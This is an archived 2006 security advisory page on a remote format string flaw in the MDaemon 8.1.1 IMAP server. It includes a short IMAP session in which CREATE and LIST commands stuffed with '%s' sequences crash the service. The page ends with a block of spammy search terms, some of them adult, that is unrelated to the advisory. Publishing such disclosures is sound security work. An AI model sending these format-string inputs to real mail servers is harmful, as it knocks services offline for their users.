about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , Alt-N MDaemon IMAP Server Remote Format String Vulnerability


Title Alt-N MDaemon IMAP Server Remote Format String Vulnerability
Published 2006-02-27-12:00AM
Updated 2006-03-02-08:41PM
Class Input Validation Error
CVE  
Remote  Yes
Local  No
Credit  Discovery is credited to Nemesis Security Audit Group.
Vulnerable  AltN MDaemon 8.1.1
Not Vulnerable  
Code   The following IMAP sequence is sufficient to demonstrate causing a denial of service condition:

M:Distrib c>nc -v 127.0.0.1 143
Blaster [127.0.0.1] 143 (imap) open
* OK hack.com IMAP4rev1 MDaemon 8.1.1 ready
0001 LOGIN "user" "password"
0001 OK LOGIN completed
0003 CREATE "%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s
%s%s%s%s%s"
0003 OK CREATE completed
0004 LIST "%s%s%s%s%s%s%s" "%s"

Currently we are not aware of any exploits for this issue. If you feel we are in error or are aware of more recent information, please mail us at: content@securitydot.net <mailto:content@securitydot.net>.
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Thu, 04 Dec 2008 17:25:18 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
t451t Www.pasion news for c www.britne t15t Www.pasion Www.pasion t735t www.blueap WWW.XXX.89 www.sriyas www.taruna CMS is Fre phpbb%202. phpbb%202. Www.Sexgir SEXYS VIDE t112t www.bbw.co www.blueap t112t filecheck www,cartoo www.famosa Www.Soon18 sources/fu wwwsexygir Nalgonas www.djmdma www.ayizoo t112t Joomlaboar ax+sexi www.taruna t290t snitz 3.4. mom+son+in productdis Tamil sex fanmaza Sex.open wwwwoldsex Www.urduka Bigboobswi /xvxx www.avizoo productdis www.eurotc productdis www.blue.f